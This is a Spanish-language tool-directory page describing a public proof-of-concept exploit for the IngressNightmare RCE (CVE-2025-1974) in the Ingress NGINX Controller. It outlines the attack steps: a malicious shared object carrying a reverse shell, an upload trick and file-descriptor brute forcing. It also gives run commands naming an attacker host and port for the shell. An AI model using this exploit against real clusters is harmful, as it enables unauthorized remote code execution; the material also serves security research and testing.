Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1974 — Prueba de concepto para Ingress RCE | Kitploit
Herramientas/GitHubGitHub/zwxxb/cve-2025-1974
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad en la NubeAprendizaje y EducaciónRed Teaming
GitHubzwxxb/cve-2025-1974

CVE-2025-1974

Prueba de concepto para Ingress RCE

Ver Repositorio
833hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para Ingress NGINX - IngressNightmare

Este proyecto proporciona un exploit dirigido a vulnerabilidades críticas de ejecución remota de código (RCE) no autenticada en el Ingress NGINX Controller para Kubernetes, conocidas colectivamente como IngressNightmare.

En la investigación original, el equipo de Wiz no proporcionó un PoC ni un exploit funcional, por lo que decidimos crear el nuestro y compartirlo con la comunidad.

Resumen

El Ingress NGINX Controller es un componente ampliamente utilizado en entornos Kubernetes, que gestiona el acceso externo a los servicios dentro de los clústeres. Vulnerabilidades recientes (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) han puesto de manifiesto riesgos de seguridad críticos.

Flujo de trabajo del exploit

El exploit sigue estos pasos principales:

Generar objeto compartido (utilizado por la propiedad ssl_engine inyectada): Compila una librería .so (evil_engine.so) que contiene un payload de reverse shell.

Subir el objeto compartido: Envía el objeto compartido compilado al pod del ingress, aprovechando el manejo de solicitudes (búferes del cuerpo del cliente). El truco aquí es enviar un Content-Length diferente al servidor para mantener la conexión abierta.

Fuerza bruta de fd: Itera sobre los ID de proceso y los descriptores de archivo (/proc/{pid}/fd/{fd}) para identificar el descriptor correcto que hace referencia al objeto subido.

Uso

Requisitos previos:

  • Python 3.x
  • Compilador GCC
  • Módulo requests de Python

Ejecutar el exploit:

pip3 install -r requirements.txt

python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/zwxxb/cve-2025-1974/blob/main/attacker_host%3Aport)

Ej: python3 poc.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443

A veces, el admission webhook se encuentra en un namespace diferente. En este caso, debes especificar el namespace al final, como kube-system, default o ingress-nginx.

  • <ingress_url>: URL del Ingress de destino (pública)
  • <admission_webhook_url>: URL del webhook de admisión (webhook interno)
  • [attacker_host:port](https://github.com/zwxxb/cve-2025-1974/blob/main/attacker_host%3Aport): Tu host y puerto para el reverse shell

Descargo de responsabilidad

Este exploit se proporciona estrictamente con fines educativos y de investigación. El uso no autorizado de esta herramienta contra objetivos sin permiso explícito está prohibido. Hakai Security y QuimeraX no se hacen responsables del mal uso de esta herramienta.

Descargar herramienta